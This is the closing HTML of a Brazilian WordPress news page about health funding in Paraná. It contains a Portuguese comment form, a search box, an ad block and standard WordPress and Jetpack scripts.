		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/parana-tera-mais-r-190-milhoes-para-area-da-saude/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='5542' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="cc542c56c7" /></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="210"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2018 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>
	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/parana-tera-mais-r-190-milhoes-para-area-da-saude\/":5542};
	</script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201801'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2018Janaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.1'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.1'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.1'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.0.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=5.6.1'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201801.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.6.1',blog:'12891280',post:'5542',tz:'-2',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '5542' ]);
</script>
</body>
</html>